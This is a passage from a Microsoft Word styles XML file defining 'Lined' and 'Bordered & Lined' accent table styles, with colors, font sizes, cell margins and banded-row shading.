    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C7D7EA" w:themeFill="accent1" w:themeFillTint="50"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C7D7EA" w:themeFill="accent1" w:themeFillTint="50"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Lined-Accent2">
    <w:name w:val="Lined - Accent 2"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2DCDC" w:themeFill="accent2" w:themeFillTint="32"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2DCDC" w:themeFill="accent2" w:themeFillTint="32"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Lined-Accent3">
    <w:name w:val="Lined - Accent 3"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAF1DC" w:themeFill="accent3" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAF1DC" w:themeFill="accent3" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Lined-Accent4">
    <w:name w:val="Lined - Accent 4"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Lined-Accent5">
    <w:name w:val="Lined - Accent 5"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Lined-Accent6">
    <w:name w:val="Lined - Accent 6"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE9D8" w:themeFill="accent6" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE9D8" w:themeFill="accent6" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="BorderedLined-Accent">
    <w:name w:val="Bordered &amp; Lined - Accent"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR"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StylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="BorderedLined-Accent1">
    <w:name w:val="Bordered &amp; Lined - Accent 1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>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0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C7D7EA" w:themeFill="accent1" w:themeFillTint="50"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C7D7EA" w:themeFill="accent1" w:themeFillTint="50"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="BorderedLined-Accent2">
    <w:name w:val="Bordered &amp; Lined - Accent 2"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2DCDC" w:themeFill="accent2" w:themeFillTint="32"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2DCDC" w:themeFill="accent2" w:themeFillTint="32"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="BorderedLined-Accent3">
    <w:name w:val="Bordered &amp; Lined - Accent 3"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAF1DC" w:themeFill="accent3" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAF1DC" w:themeFill="accent3" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="BorderedLined-Accent4">
    <w:name w:val="Bordered &amp; Lined - Accent 4"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="BorderedLined-Accent5">
    <w:name w:val="Bordered &amp; Lined - Accent 5"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>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color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
